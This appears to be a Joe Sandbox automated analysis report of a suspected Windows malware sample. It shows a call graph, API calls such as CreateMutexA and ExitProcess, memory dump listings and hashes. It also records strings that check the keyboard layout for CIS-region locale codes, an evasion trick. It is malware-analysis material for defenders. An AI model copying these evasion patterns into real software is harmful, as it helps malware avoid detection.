eae6bb 12921->12922 12925 eae5c9 12922->12925 12924 eae6c1 12924->12876 12926 eae5d5 __fassign ___free_lconv_mon 12925->12926 12927 eae5f6 12926->12927 12928 ea8bec __fassign 4 API calls 12926->12928 12927->12924 12929 eae668 12928->12929 12933 eae6a4 12929->12933 12934 eaa72e 12929->12934 12933->12924 12935 eaa739 __fassign 12934->12935 12936 ead82f __fassign RtlAllocateHeap 12935->12936 12940 eaa745 __fassign ___free_lconv_mon 12935->12940 12936->12940 12937 ea8bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12938 eaa7c7 12937->12938 12939 eaa7be 12941 eae4b0 12939->12941 12940->12937 12940->12939 12942 eae5c9 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12941->12942 12943 eae4c3 12942->12943 12944 eae259 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12943->12944 12945 eae4cb __fassign 12944->12945 12946 eae6c4 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12945->12946 12947 eae4dc __fassign ___free_lconv_mon 12945->12947 12946->12947 12947->12933 12949 ea690a __fassign 4 API calls 12948->12949 12950 eab6be 12949->12950 12952 eab6ce std::future_error::future_error 12950->12952 12958 eaf1bf 12950->12958 12952->12861 12954 eaa671 __fassign 4 API calls 12953->12954 12955 eab688 12954->12955 12956 eab5fb __fassign 4 API calls 12955->12956 12957 eab698 12956->12957 12957->12861 12959 ea690a __fassign 4 API calls 12958->12959 12960 eaf1df __cftof __fassign __freea std::future_error::future_error 12959->12960 12960->12952 12962 ea887a 12961->12962 12963 ea690a __fassign 4 API calls 12962->12963 12966 ea888f __cftof 12962->12966 12965 ea88bf 12963->12965 12964 ea6d52 4 API calls 12964->12965 12965->12964 12965->12966 12966->12834 13601 e72b90 13602 e72bce 13601->13602 13603 e8b7fb TpReleaseWork 13602->13603 13604 e72bdb shared_ptr std::future_error::future_error 13603->13604 13750 e72b10 13751 e72b1c 13750->13751 13752 e72b1a 13750->13752 13753 e8c26a 5 API calls 13751->13753 13754 e72b22 13753->13754 13438 e887d0 13439 e8882a __cftof 13438->13439 13445 e89bb0 13439->13445 13443 e888d9 std::_Throw_future_error 13444 e8886c std::future_error::future_error 13458 e89ef0 13445->13458 13447 e89be5 13448 e72ce0 5 API calls 13447->13448 13449 e89c16 13448->13449 13462 e89f70 13449->13462 13451 e88854 13451->13444 13452 e743f0 13451->13452 13453 e8bedf InitOnceExecuteOnce 13452->13453 13454 e7440a 13453->13454 13455 e74411 13454->13455 13456 ea6cbb 4 API calls 13454->13456 13455->13443 13457 e74424 13456->13457 13459 e89f0c 13458->13459 13460 e8c68b __Mtx_init_in_situ 2 API calls 13459->13460 13461 e89f17 13460->13461 13461->13447 13463 e89fef shared_ptr 13462->13463 13465 e8a058 13463->13465 13467 e8a210 13463->13467 13466 e8a03b 13466->13451 13468 e8a290 13467->13468 13474 e871d0 13468->13474 13470 e8a2cc shared_ptr 13471 e8a4be shared_ptr 13470->13471 13472 e73ee0 3 API calls 13470->13472 13471->13466 13473 e8a4a6 13472->13473 13473->13466 13475 e87211 13474->13475 13482 e73970 13475->13482 13477 e87446 std::future_error::future_error 13477->13470 13478 e872ad __cftof 13478->13477 13479 e8c68b __Mtx_init_in_situ 2 API calls 13478->13479 13480 e87401 13479->13480 13487 e72ec0 13480->13487 13483 e8c68b __Mtx_init_in_situ 2 API calls 13482->13483 13484 e739a7 13483->13484 13485 e8c68b __Mtx_init_in_situ 2 API calls 13484->13485 13486 e739e6 13485->13486 13486->13478 13488 e72f06 13487->13488 13489 e72f7e GetCurrentThreadId 13487->13489 13492 e8c6ac GetSystemTimePreciseAsFileTime 13488->13492 13490 e72fef 13489->13490 13491 e72f94 13489->13491 13490->13477 13491->13490 13497 e8c6ac GetSystemTimePreciseAsFileTime 13491->13497 13493 e72f12 13492->13493 13494 e7301e 13493->13494 13500 e72f1d __Mtx_unlock 13493->13500 13495 e8c26a 5 API calls 13494->13495 13496 e73024 13495->13496 13498 e8c26a 5 API calls 13496->13498 13499 e72fb9 13497->13499 13498->13499 13502 e8c26a 5 API calls 13499->13502 13503 e72fc0 __Mtx_unlock 13499->13503 13500->13496 13501 e72f6f 13500->13501 13501->13489 13501->13490 13502->13503 13504 e8c26a 5 API calls 13503->13504 13505 e72fd8 __Cnd_broadcast 13503->13505 13504->13505 13505->13490 13506 e8c26a 5 API calls 13505->13506 13507 e7303c 13506->13507 13508 e8c6ac GetSystemTimePreciseAsFileTime 13507->13508 13516 e73080 shared_ptr __Mtx_unlock 13508->13516 13509 e731c5 13510 e8c26a 5 API calls 13509->13510 13511 e731cb 13510->13511 13512 e8c26a 5 API calls 13511->13512 13513 e731d1 13512->13513 13514 e8c26a 5 API calls 13513->13514 13522 e73193 __Mtx_unlock 13514->13522 13515 e731a7 std::future_error::future_error 13515->13477 13516->13509 13516->13511 13516->13515 13519 e73132 GetCurrentThreadId 13516->13519 13517 e8c26a 5 API calls 13518 e731dd 13517->13518 13519->13515 13520 e7313b 13519->13520 13520->13515 13521 e8c6ac GetSystemTimePreciseAsFileTime 13520->13521 13523 e7315f 13521->13523 13522->13515 13522->13517 13523->13509 13523->13513 13523->13522 13524 e8bd4c GetSystemTimePreciseAsFileTime 13523->13524 13524->13523 13605 e73f9f 13606 e73fb6 13605->13606 13607 e73fad 13605->13607 13608 e72410 5 API calls 13607->13608 13608->13606 13328 e8d111 13329 e8d121 13328->13329 13330 e8d12a 13329->13330 13332 e8d199 13329->13332 13333 e8d1a7 SleepConditionVariableCS 13332->13333 13335 e8d1c0 13332->13335 13333->13335 13335->13329 13336 e79adc 13337 e79aea 13336->13337 13341 e79afe shared_ptr 13336->13341 13338 e7a917 13337->13338 13337->13341 13339 e7a953 Sleep CreateMutexA 13338->13339 13340 e7a98e 13339->13340 13342 e75c10 6 API calls 13341->13342 13343 e79b7c 13342->13343 13350 e78b30 13343->13350 13345 e79b8d 13346 e75c10 6 API calls 13345->13346 13347 e79cb1 13346->13347 13348 e78b30 6 API calls 13347->13348 13349 e79cc2 13348->13349 13351 e78b7c 13350->13351 13352 e75c10 6 API calls 13351->13352 13353 e78b97 shared_ptr std::future_error::future_error 13352->13353 13353->13345 13278 e7215a 13279 e8c6fc InitializeCriticalSectionEx 13278->13279 13280 e72164 13279->13280
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00EA652A,?,?,?,?,?,00EA7661), ref: 00EA6566
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 0b57f36954b55a22c8ba99cd834f398cd827c169ea8d9d0a0baedbb2edf63f1b
                                                                                                                                                                                                                                                  • Instruction ID: 0eaaeb7660d7a30ec77274fef0ca43925c55575fbe75b81ccb229277f1f51821
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b57f36954b55a22c8ba99cd834f398cd827c169ea8d9d0a0baedbb2edf63f1b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAE08C30441208AECE357B18CC09E8D3B6AEB07758F086814FD086E221CB35FD86CA80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6ef15cb8d789cfb7e0be9527c841fe2e373c7af1d2fc42a1b7992d5ba26d96eb
                                                                                                                                                                                                                                                  • Instruction ID: bfe83088306e67c90e50c0430317309c408e4e88bbadb62bd4de7eef806a5536
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ef15cb8d789cfb7e0be9527c841fe2e373c7af1d2fc42a1b7992d5ba26d96eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C01A2BFA0D211BD6152D1853B58AF6A7ABE6DB330330C427F607C6603D2844A5BE332

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                  • API String ID: 0-3963862150
                                                                                                                                                                                                                                                  • Opcode ID: 84a5472fc8d04eb7b01219ed97f5cafddea48d71849e7e3870efe798ec738c5c
                                                                                                                                                                                                                                                  • Instruction ID: 8cef42021445d0000f43bd0a8b5543180c658430198dacc6a2640faa1f27f498
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84a5472fc8d04eb7b01219ed97f5cafddea48d71849e7e3870efe798ec738c5c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0F1E171A0024C9BEB24DF54CD84BDEBBB9EB45304F5086A9F50CB72C1DBB49A84CB94

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 92 e79ba5-e79d91 call e87a00 call e75c10 call e78b30 call e88220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
